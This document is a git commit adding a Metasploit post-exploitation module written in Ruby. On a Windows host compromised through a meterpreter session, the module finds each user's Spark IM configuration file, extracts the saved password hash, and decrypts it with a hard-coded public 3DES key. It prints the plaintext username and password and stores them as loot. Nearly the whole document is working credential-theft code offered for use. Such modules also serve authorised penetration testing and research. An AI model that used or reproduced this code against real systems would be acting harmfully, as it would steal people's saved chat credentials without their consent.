added spark_im post exploit module

unstable
Brandon McCann 2012-12-26 17:28:23 -06:00
parent 433532ddf4
commit 7147e7a09b
1 changed files with 113 additions and 0 deletions

View File

@ -0,0 +1,113 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/windows/user_profiles'
require 'openssl'
class Metasploit3 < Msf::Post
include Msf::Post::Common
include Msf::Post::Windows::UserProfiles
def initialize(info={})
super(update_info(info,
'Name' => 'Enumerate Spark IM Passwords',
'Description' => %q{ This module will enumerate passwords stored by the Spark IM client.
The encryption key is publicly known. This module will not only extract encrypted password
but will also decrypt password using public key.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Brandon McCann "zeknox" <bmccann [at] accuvant.com>',
'Thomas McCarthy "smilingraccoon" <smilingraccoon [at] gmail.com>'
],
'SessionTypes' => [ 'meterpreter' ],
'References' =>
[
[ 'URL', 'http://adamcaudill.com/2012/07/27/decrypting-spark-saved-passwords/']
]
))
end
# decrypt spark password
def decrypt(hash)
# code to decrypt hash with KEY
print_status("Starting to decrypt password hash")
encrypted = hash.unpack("m")[0]
key = "ugfpV1dMC5jyJtqwVAfTpHkxqJ0+E0ae".unpack("m")[0]
cipher = OpenSSL::Cipher::Cipher.new 'des-ede3'
cipher.decrypt
cipher.key = key
password = cipher.update encrypted
password << cipher.final
password = password.encode('UTF-8')
credentials = password.split("\u0001")
print_good("Decrypted Username #{credentials[0]} Password: #{credentials[1]}")
store_creds(credentials)
end
def store_creds(credentials)
if db
report_auth_info(
:host => client.sock.peerhost,
:port => 445,
:ptype => 'password',
:sname => 'smb',
:user => credentials[0],
:pass => credentials[1],
:duplicate_ok => true,
:active => true
)
print_status("Loot stored in the db")
end
end
# main control method
def run
grab_user_profiles().each do |user|
unless user['AppData'].nil?
accounts = user['AppData'] + "\\Spark\\spark.properties"
# open the file for reading
config = client.fs.file.new(accounts, 'r') rescue nil
next if config.nil?
print_status("Config found for user #{user['UserName']}")
# read the contents of file
contents = config.read
# look for lines containing string 'password'
password = contents.split("\n").grep(/password/)
if password.nil?
# file doesn't contain a password
print_status("#{file} does not contain any saved passwords")
# close file and return
config.close
return
end
# store the hash close the file
hash = password[1].split("password").join.chomp
print_status("Spark password hash: #{hash}") if datastore['VERBOSE']
config.close
# call to decrypt the hash
decrypt(hash)
end
end
end
end